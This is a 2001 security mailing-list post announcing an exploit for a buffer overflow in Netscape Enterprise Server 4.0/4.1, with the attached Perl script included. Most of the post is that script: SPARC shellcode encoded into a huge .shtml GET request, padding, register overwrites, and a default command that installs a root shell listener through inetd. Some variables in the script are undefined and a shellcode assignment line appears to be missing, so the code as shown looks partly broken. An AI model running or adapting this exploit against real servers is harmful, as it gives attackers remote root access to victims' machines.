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iWS/NES SHTML Overflow (exploit)

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Date: Thu, 25 Jan 2001 20:01:02 +0700
From: Security Research Team <security@RELAYGROUP.COM>
Subject: iWS/NES SHTML Overflow (exploit)

Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Attached is 'slightly obfuscated' exploit for the buffer overflow in Netscape Enterprise Server (iPlanet Web Server) 4.0 and 4.1 (up to SP4), for which the advisory has been released earlier ( ).

Exploit has been tested on SunOS 5.7 (Sparc) and NES 4.0

NOTE: We will ignore *ANY* mails with request for help related to this exploit.

Author of the exploit is Fyodor Yarochkin <>


   S.A.F.E.R. - Security Alert For Enterprise Resources
          Copyright (c) 2001 The Relay Group  ----

Content-Type: application/x-perl
Content-Disposition: attachment; filename=""


# Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7
# usage: ['command line'] | nc victim port
# Sometimes server may hang or coredump.. eek ;-)

$cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob; /usr/sbin/inetd -s /tmp/bob";
$cmdline=$ARGV[0] if $ARGV[0];

$strlen=0x54 + length($cmdline);
$cmdline=~ s/ /%20/g; # encode bad characters..
$strlen=sprintf "%%%x", $strlen;

'%20%bf%ff%ff' .#  start:	bn,a <start-4>			  ! super-dooper trick to get current address ;')
'%20%bf%ff%ff' .#  boom:	bn,a  <start>
'%7f%ff%ff%ff' .#  		call boom
'%90%03%e0%48' .#  		add %o7, binksh - boom, %o0       ! put binksh address into %o0
'%92%03%e0%38' .#  		add %o7, argz - boom, %o1         ! put address of argz array into %o1
'%a0%03%e0%51' .#  		add %o7, minusc - boom, %l0       ! put address of -c argument into %l0
'%a2%03%e0%54' .#  		add %o7, cmdline - boom, %l1      ! put address of command line argument into %l1
'%c0%2b%e0%50' .#  		stb %g0, [ %o7 + minusc-boom-1 ]  ! put ending zero byte at the end of /bin/sh
'%c0%2b%e0%53' .#		stb %g0, [ %o7 + cmdline-boom-1 ] ! put ending zero byte at the end of -c
'%c0%2b%e0' . $strlen .#        stb %g0, [ %o7 + endmark-boom-1 ] ! put ending zero byte at the end of command line
'%d0%23%e0%38' .#		st %o0, [ %o7 + argz-boom ]       ! store pointer to ksh into 0 element of argz
'%e0%23%e0%3c' .#		st %l0, [ %o7 + argz-boom+4 ]     ! store pointer to -c into 1 element of argz
'%e2%23%e0%40' .#		st %l1, [ %o7 + argz-boom+8 ]     ! store pointer to cmdline into 2 element of argz
'%c0%23%e0%44' .#		st %g0, [ %o7 + argz-boom+12 ]    ! store NULL pointer at the end
'%82%10%20%0b' .#		mov 0xb, %g1
'%91%d0%20%08' .#		ta 8
'%ff%ff%ff%ff'.  # 40	argz: 0xffffffff;
'%ff%ff%ff%ff'.   # 44	      0xffffffff;
'%ff%ff%ff%ff'.   # 48        0xffffffff;
'%ff%ff%ff%ff'.   # 52	      0xffffffff;
'/bin/kshA' .     # 56  binksh: "/bin/kshA";
'-cA' . $cmdline . 'A'; # cmdline: "blahblahA";

# Generate huge GET /..<shellcode>...shtml here  #
print STDERR "pad is $padd\n";

print "GET /";

print $nop x 40;
print $she11;
print "A"x $padd;

print "\xfd\xe7%dc\x80"; # %i0
print "AAAA"; # %i1
print "AAAA"; # %i2
print "AAAA"; # %i3
print "AAAA"; # %i4
print "AAAA"; # %i5
print '%fd%c3%16%58'; #%fp (%i6)
print '%ff%21%d7%ac'; # %i7
print "A"x1200;

print ".shtml HTTP/1.0\n\n";


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